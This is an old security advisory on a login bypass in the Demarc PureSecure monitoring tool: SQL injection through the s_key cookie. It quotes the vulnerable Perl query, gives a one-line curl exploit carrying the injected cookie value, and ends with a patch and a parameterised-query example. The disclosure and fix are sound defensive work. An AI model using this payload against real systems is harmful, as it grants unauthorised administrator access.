
Demarc PureSecure login bypass
19th Apr 2002 [SBWID-5293]
COMMAND

	Demarc PureSecure login bypass

SYSTEMS AFFECTED

	all versions ?

PROBLEM

	pokleyzz sakamaniaka says:
	

	Demarc PureSecure (http://www.demarc.org) is  an  all-inclusive  network
	monitoring solution that allows you to  monitor  an  entire  network  of
	servers from one powerful web interface.
	

	A user can bypass login and get admin status by SQL injection through
	the cookie s_key.
	

	

	--------- line 319 ------------------------------
	elsif (($cookies{'s_key'}) && ($cookies{'s_key'}->value)){
		$logged_in_as = &check_login($cookies{'s_key'}->value);
		if (!$logged_in_as){
			&print_login_screen;
			&safe_exit;
		}
	-----------------------------------------------------

	

	

	s_key will be used in the SQL query in function check_login (line 6114).
	

	

	--------- line 6114 ---------------------------------
	$sql_query = "	SELECT \
				f1,f2,f3,admin,username,UNIX_TIMESTAMP(current_login_timedate) AS LOGINTIME \
			FROM \
				dm_sessions \
			WHERE current_session_id = '$session_id' ";
	-----------------------------------------------------

	

	

	

	 Exploit 

	 =======

	

	Using curl:

	curl -b s_key=\'%20OR%20current_session_id%20like%20\'%\'%23 https://<lame host>/dm/demarc

	

	

SOLUTION

	Patch as follows:

	line 6113: &safe_slash(\$session_id);
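
The patch above escapes the value before it is interpolated; binding it as a query parameter after a format check removes the interpolation altogether. The following is an added example, not Demarc's code: it uses Python and SQLite as a stand-in for the Perl/MySQL application, and the table row, the 32-hex-character session id format and every function name other than check_login are assumptions.

```python
import re
import sqlite3
from urllib.parse import unquote

# Assumption: session ids are 32 lowercase hex characters (format not given on the page).
SESSION_ID_RE = re.compile(r"[0-9a-f]{32}")

def make_db():
    """In-memory stand-in for dm_sessions; the row is constructed sample data."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE dm_sessions (current_session_id TEXT PRIMARY KEY, "
               "username TEXT, admin INTEGER, current_login_timedate INTEGER)")
    db.execute("INSERT INTO dm_sessions VALUES (?, ?, ?, ?)",
               ("0123456789abcdef0123456789abcdef", "root", 1, 1019174400))
    return db

def interpolated_query(session_id):
    """The pattern at line 6114: the cookie text becomes part of the SQL statement."""
    return ("SELECT username, admin FROM dm_sessions "
            "WHERE current_session_id = '%s'" % session_id)

def check_login(db, cookie_value):
    """Hardened lookup: validate the format, then bind the value as data."""
    session_id = unquote(cookie_value)   # assumed: the cookie layer URL-decodes values
    if not SESSION_ID_RE.fullmatch(session_id):
        return None                      # rejected before it reaches the database
    return db.execute("SELECT username, admin FROM dm_sessions "
                      "WHERE current_session_id = ?", (session_id,)).fetchone()

if __name__ == "__main__":
    db = make_db()
    page_cookie = "'%20OR%20current_session_id%20like%20'%'%23"  # value from the page
    print(interpolated_query(unquote(page_cookie)))  # quote closes the literal early
    print(check_login(db, page_cookie))                          # None
    print(check_login(db, "0123456789abcdef0123456789abcdef"))   # ('root', 1)
```

With the bound parameter the database compares the whole cookie string against current_session_id, so a value containing quotes can only fail to match.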

	
